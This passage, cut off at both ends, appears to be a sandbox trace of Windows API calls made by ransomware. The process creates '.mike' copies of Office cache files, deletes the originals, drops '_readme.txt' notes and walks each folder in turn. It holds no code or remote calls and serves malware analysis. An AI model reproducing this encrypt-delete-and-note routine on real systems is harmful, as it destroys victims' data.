Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.096] GetFileType (hFile=0x264) returned 0x1 [0040.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.096] GetFileType (hFile=0x264) returned 0x1 [0040.096] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.096] WriteFile (in: hFile=0x264, lpBuffer=0x224e1bc*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x224e1bc*, lpNumberOfBytesWritten=0x2af104*=0x710, lpOverlapped=0x0) returned 1 [0040.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.097] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.097] GetFileType (hFile=0x264) returned 0x1 [0040.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.097] GetFileType (hFile=0x264) returned 0x1 [0040.098] WriteFile (in: hFile=0x264, lpBuffer=0x22513ec*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x22513ec*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.098] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", dwFileAttributes=0x80) returned 1 [0040.098] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0040.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.099] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.100] GetFileType (hFile=0x264) returned 0x1 [0040.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.100] GetFileType (hFile=0x264) returned 0x1 [0040.100] WriteFile (in: hFile=0x264, lpBuffer=0x2254884*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2254884*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.101] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe218cc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21b2dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.101] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe218cc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21b2dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.102] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2166b00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2166b00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe218cc60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.102] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0040.102] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0040.102] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe218cc60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe218cc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21b2dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x930, dwReserved0=0x0, dwReserved1=0x0, cFileName="WordMUI.xml.mike", cAlternateFileName="WORDMU~1.MIK")) returned 1 [0040.102] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe218cc60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe218cc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21b2dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.102] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe218cc60, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe218cc60, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe21b2dc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.102] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.103] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.103] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.103] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.103] CoTaskMemFree (pv=0x4fe370) [0040.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.103] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.103] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.103] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.103] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.157] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proofing.xml", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.158] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.158] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.159] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi", lpFilePart=0x0) returned 0x4b [0040.159] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.159] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.159] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.160] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.160] GetFileType (hFile=0x264) returned 0x1 [0040.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.160] GetFileType (hFile=0x264) returned 0x1 [0040.161] CloseHandle (hObject=0x264) returned 1 [0040.161] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.161] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.161] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.161] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.161] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x225be9c | out: lpFileInformation=0x225be9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b)) returned 1 [0040.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.161] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.161] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x225c1c8 | out: lpFileInformation=0x225c1c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x32b)) returned 1 [0040.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.161] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.161] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.162] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0040.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.162] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.162] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike", lpFilePart=0x0) returned 0x50 [0040.162] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.163] GetFileType (hFile=0x264) returned 0x1 [0040.163] GetFileType (hFile=0x264) returned 0x1 [0040.163] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.163] WriteFile (in: hFile=0x264, lpBuffer=0x225d0b8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x225d0b8*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.164] CloseHandle (hObject=0x264) returned 1 [0040.164] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x225cba0 | out: lpFileInformation=0x225cba0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, 